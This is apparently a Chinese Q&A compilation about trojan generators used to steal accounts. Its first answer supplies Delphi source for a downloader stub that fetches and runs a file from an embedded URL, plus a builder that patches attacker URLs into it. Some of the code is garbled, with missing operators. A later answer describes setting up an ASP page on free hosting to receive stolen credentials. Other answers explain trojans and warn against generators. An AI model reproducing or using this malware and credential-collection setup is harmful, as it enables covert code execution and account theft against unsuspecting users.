盗号木马生成器,木马生成器的工作原理?
本文目录索引
1,木马生成器的工作原理?
先写服务端Server.exe,控制台程序program server; {$IMAGEBASE $13140000} uses Windows, SysUtils, urlmon, shellapi; var url: pchar ='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'; procedure Download; begin URLDownloadToFile(nil, url, 'c:\1.txt', 0, nil); shellexecute(0,'open','c:\1.txt',0,0,1); end; begin DownLoad; end. 再将Server.exe做成资源文件,RC文件写:jack RCDATA server.exe
找Server.exe文件偏移地址,用C32打开Server.exe,查找aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
将首地址转换成十进制即是我们要找的下载地址偏移。再写主程序,将Server.exe资源文件加入,{$R server.RES}。 unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls; const OFFSET_URL = 65400; //下载地址偏移 type TForm1 = class(TForm) Label1: TLabel; Edit1: TEdit; Button1: TButton; Edit2: TEdit; procedure Button1Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} {$R server.RES} procedure TForm1.Button1Click(Sender: TObject); var WriteBuff, ResultFilePath, ResourcePointer: PChar; ResourceLocation: HRSRC; ResourceSize, BytesWritten: Longword; ResDataHandle: THandle; FileHandle: THandle; sf:TSaveDialog; Url:string; begin if trim(edit1.Text)='' then begin Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation); exit; end; sf :=TSaveDialog.Create(Application); sf.DefaultExt :='exe'; sf.Title :='生成'; if not sf.Execute then exit; Url :=trim(Edit1.Text); //trim函数去掉空格,取得编辑框输入的内容 ResultFilePath := pchar(sf.FileName); ResourceLocation := FindResource(HInstance, 'jack', RT_RCDATA); //用资源RCDATA中urlmm资源 if ResourceLocation 0 then begin ResourceSize := SizeofResource(HInstance, ResourceLocation); if ResourceSize 0 then begin ResDataHandle := LoadResource(HInstance, ResourceLocation); if ResDataHandle 0 then begin ResourcePointer := LockResource(ResDataHandle); if ResourcePointer nil then begin FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if FileHandle INVALID_HANDLE_VALUE then begin WriteFile(FileHandle, ResourcePointer^, {资源+大小的英语}ResourseSize, BytesWritten, nil); Sleep(10); //写入信息 SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN); WriteBuff := PChar(Url + StringOfChar(#0, 64 - Length(Url)));//64是我们预留的那个字符串的长度(即64个a) WriteFile(FileHandle, WriteBuff^, 64, BytesWritten, nil); CloseHandle(FileHandle); //这个一定不能少 MessageBox(0, '配置成功', '提示', mb_iconinformation); end; end; end; end; end; end; end.
2,木马是网站里干什么用的?木马是什么意思?
木马并不是网站的什么该有的功能或者模块,他是一些别有用心的人装上的后门,去窃取你的隐私数据,控制你的电脑。
木马是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。利用计算机程序漏洞侵入后窃取文件,它是一种具有隐藏性的、自发性的可被用来进行恶意行为的程序,多不会直接对电脑产生危害,而是以控制为主。
3,网马生成器是什么?怎么用?
楼主你要干什么??网马不是好东西!小心还可能是病毒啊!马上删除了他,彻底清除!
方法:开始-程序-你那个软件-卸载程序
OK
网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。
网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
4,木马生成器用法
你可以在 www.5944.com www.qizai.com 的网站申请个免费空间 然后把木马生成器的 qq.asp也不一定是QQ.ASP也可能是别的ASP或HPH 一般都是QQ.ASP
把这个文件上传到FTP空间 比如你的空间地址是123456.qizai.com那你的收信地址就是123456.qizai.con/qq.asp 我不打字和你说了 要是想学就加我吧 我免费叫你 370504064 加我吧
5,我下载了木马生成器,可怎么才能生成有用的木马?
木马生成器都有捆绑病毒,赶紧检查下你的电脑吧。要是下载的时候杀软根本没报毒,那你就更惨了,你估计遇上新病毒了。什么木马生成器都是真正的黑客用来骗你们这些个菜鸟的,大多数有点技术的黑客都自己写木马,而且程序工作者最重视自己的劳动成果了,除了玩linux的根本没人会把源码公布,更何况你这是木马生成器这种“高级”玩意。。。